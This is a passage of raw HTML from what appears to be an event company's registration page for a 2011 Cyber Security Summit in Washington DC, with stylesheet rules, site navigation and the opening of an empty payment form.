span{margin-left:15px;}#brighton_sub-menu ul li.childitem1.last{padding-bottom:10px;}#brighton_sub-menu ul li.selectedpath{font-weight:normal;}/* fix to negate radmenu inherited style */#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#wrapper #left_main .right .eventtitle { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}#wrapper #left_main .right .fancy li { list-style-image: url(assets/templates/images/2010_bullet.png);}#wrapper #left_main .right .eventtitle a { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}</style><script language="javascript" type="text/javascript">//<![CDATA[var tl_loc0=(window.location.protocol == "https:")? "https://secure.comodo.net/trustlogo/javascript/trustlogo.js" :"http://www.trustlogo.com/trustlogo/javascript/trustlogo.js";document.writeln('<scr' + 'ipt language="JavaScript" src="'+tl_loc0+'" type="text\/javascript">' + '<\/scr' + 'ipt>');//]]></script></head><body> <div id="wrapper"><div id="header"><img src="https://events.gsmiweb.com/images/logo.gif" width="249" height="75" align="left" /><img src="https://events.gsmiweb.com/images/phone.gif" width="250" height="75" align="right" /></div><div id="navigation"><ul class="dropdown dropdown-horizontal"><li><a href="http://gsmiweb.com/" title="Home" Business Management Training>Home</a></li><li><a href="http://events.gsmiweb.com/events.php" title="Events" >Events</a></li><li class="active"><a href="http://gsmiweb.com/training.html" title="Training" >Training</a><ul><li><a href="/training/in-house-training.html" title="In-House Training" >In-House Training</a></li><li><a href="http://gsmiweb.com/training/balancedscorecard.html" title="Balanced Scorecard Training" >Balanced Scorecard Training</a></li><li class="last"><a href="http://gsmiweb.com/training/quality-assurance-masters.html" title="Quality Assurance Masters" >Quality Assurance Masters</a></li></ul></li><li><a href="http://gsmiweb.com/webinars.html" title="Online Webinars" >Webinars</a><ul><li><a href="http://grcwebconference.gsmiweb.com/" title="GRC Webinar" >GRC Webinar</a></li></ul></li><li><a href="http://blog.gsmiweb.com" title="Blog" >Blog</a></li><li><a href="http://gsmiweb.com/sponsors.html" title="Sponsors" >Sponsors</a><ul><li><a href="http://gsmiweb.com/sponsors/corporate-sponsors.html" title="Corporate Sponsors" >Corporate Sponsors</a></li><li><a href="http://gsmiweb.com/sponsors/strategic-partners.html" title="Strategic Partners" >Strategic Partners</a></li><li><a href="http://gsmiweb.com/sponsors/media-partners.html" title="Media Partners" >Media Partners</a></li><li><a href="http://gsmiweb.com/sponsors/enterprise-software.html" title="Enterprise Software" >Enterprise Software</a></li><li><a href="http://gsmiweb.com/sponsors/sustainability.html" title="Sustainability" >Sustainability</a></li><li class="last"><a href="http://gsmiweb.com/sponsors/data-centers.html" title="Data Center" >Data Center</a></li></ul></li><li><a href="http://community.gsmiweb.com/" title="GSMI Community" _blank>GSMI Community</a></li><li><a href="http://gsmiweb.com//aboutus.html" title="About Us" >About Us</a><ul><li><a href="/aboutus/leadership-team.html" title="Leadership Team" >Leadership Team</a></li><li class="last"><a href="http://gsmiweb.com/aboutus/gsmi-team.html" title="GSMI Team" >The GSMI Team</a></li></ul></li><li class="last"><a href="http://gsmiweb.com/register.php" title="Register Now" >Register Now</a></li></ul> </div><div id="content"><h1>Register Now</h1><table width="100%" border="0" cellspacing="0" cellpadding="0" align="left"> <tr> <td height="549"> </td> <td valign="top" bgcolor="#FFFFFF"> <img src="/imgs/thumbs/5160413684d9df8af86bac.jpg" border="0" width="175" class="coverthumbs" align="right"/> <p><span class="subheaders"><h3>Cyber Security Summit</h3></span><br> <strong></strong><br><br> <li> Event Location: Washington DC</li> <li> Resort Name: <a href="http://www.kelloggconferencehotel.com/" target="_blank">Kellogg Conference Hotel Gallaudet University</a></li> <li> Event Dates: May 10th - May 12th, 2011</li> <li><a href="http://cybersecuritystrategiessummit.com/ " target="_blank">Event Information</a></li><br/><br/> <form method="post" action="" name="subscription_form" id="subscription_form"> <h1>payment information</h1> <p><em>* indicates mandatory field</em> </p> <table border="0" cellpadding="3" cellspacing="0"> <tr> <td height="28" colspan="6" class="missing"><li>Please, fill in the required fields.</li> i = 15 amount</td> </tr> <tr> <td width="98" height="28" class="content">First Name*</td> <td width="180"><input name="contact_fname" type="text" class="formside2" id="contact_fname" value=""></td> <td class="content">Last Name*</td> <td colspan="3" valign="top"><input name="contact_lname" class="formside2" type="text" id="contact_lname" value=""> </tr> <tr> <td class="content">Title*</td> <td colspan="3" valign="top"> <input name="title" type="text" id="title" class="formside2" value=""> <input type="hidden" name="event" id="event" value="Cyber Security Summit" class="formside2"> <input type..